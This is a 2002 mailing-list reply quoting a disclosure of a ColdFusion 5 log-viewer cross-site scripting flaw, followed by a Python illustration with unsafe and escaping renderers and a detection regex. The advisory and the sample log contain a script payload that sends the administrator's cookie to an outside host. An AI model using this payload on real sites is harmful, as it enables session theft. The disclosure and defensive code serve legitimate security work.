Something to note: The 'view admin log' feature in CF tends to cause stress on the CF process, and also blocks the log file during opening. So it's generally better (and safer, with this cross-site scripting problem that's been around for years) to view the log file via a text viewer on the system. By default, it's c:\cfusion\log\*.log

On Mon, 16 Dec 2002, KiLL CoLe wrote:

> Cross-site scripting vulnerability in CF 5.0. This
> issue was brought up to Macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public. The ColdFusion
> Administrator allows you to view your application log
> via your web browser. Under certain conditions, it is
> possible to remotely alter ColdFusion's application
> log. Take the following code:
>
> <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
> SELECT * FROM Products
> WHERE ProductId = #int(url.productid)#
> </CFQUERY>
>
> If the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed. Analyze this
> code: if url.productid (from the above example) were passed
> in as:
>
> <iframe name="frame1" width="0" height="0"></iframe>
> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie=" + document.cookie</script>
>
> this would enable an attacker to steal the value of
> the ColdFusion administrator's cookie. Decrypting the
> ColdFusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
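As an added illustration (not part of the original post, and not ColdFusion's own code), the Python below models the flaw described in the quoted message: an error entry carrying the attacker's URL parameter is rendered verbatim by an unsafe log viewer, rendered harmlessly by a viewer that HTML-escapes each field, and picked out by a simple scan of the message field. The log layout, thread IDs and error wording are constructed assumptions rather than a copy of a real ColdFusion 5 application.log; the payload in the second entry is the one from the post.

```python
import csv
import html
import io
import re

# Constructed sample of a ColdFusion 5 application.log. The CSV layout
# ("Severity","ThreadID","Date","Time","Application","Message"), the thread
# IDs and the error wording are assumptions for this example; the payload in
# the second entry is the one from the post, as logged by the int() failure.
SAMPLE_LOG = (
    '"Information","web-0","12/16/02","09:14:02","myapp","Application started"\n'
    '"Error","web-3","12/16/02","09:15:41","myapp","The value '
    '<iframe name=""frame1"" width=""0"" height=""0""></iframe>'
    '<script>document.frame1.location=""http://www.domain.com/index.cfm?stealcookie=""'
    ' + document.cookie</script> cannot be converted to a number."\n'
    '"Error","web-4","12/16/02","09:16:10","myapp","The value abc cannot be converted to a number."\n'
)

FIELDS = ("severity", "thread", "date", "time", "application", "message")


def parse_log(text):
    """Parse the CSV-style log text into one dict per entry (blank lines skipped)."""
    return [dict(zip(FIELDS, row)) for row in csv.reader(io.StringIO(text)) if row]


# Markup that has no business in a log message: tags that load or run script,
# javascript: URLs and inline event handlers. Case-insensitive on purpose.
INJECTION_MARKERS = re.compile(
    r"<\s*(script|iframe|img|object|embed|svg)\b|javascript:|\bon[a-z]+\s*=",
    re.IGNORECASE,
)


def find_injected_entries(entries):
    """Return the entries whose message field carries attacker-looking markup."""
    return [e for e in entries if INJECTION_MARKERS.search(e["message"])]


def render_unsafe(entries):
    """Model of the vulnerable viewer: log fields dropped into HTML verbatim,
    so a logged payload becomes live script in the administrator's browser."""
    rows = "".join(
        f"<tr><td>{e['severity']}</td><td>{e['time']}</td><td>{e['message']}</td></tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


def render_safe(entries):
    """Same viewer with every field HTML-escaped, so the payload is shown as
    text instead of executed."""
    rows = "".join(
        "<tr>"
        + "".join(f"<td>{html.escape(e[k])}</td>" for k in ("severity", "time", "message"))
        + "</tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for e in find_injected_entries(entries):
        print(f"suspicious entry from thread {e['thread']}: {e['message'][:60]}...")
    print("unsafe viewer ships script:", "<script" in render_unsafe(entries))
    print("safe viewer ships script:", "<script" in render_safe(entries))
```

The scan is a triage aid, not a filter: the real fix is the escaping in render_safe (or, as the reply suggests, not viewing the log through a browser at all), because the set of functions that log raw input is, as the post notes, much larger than int().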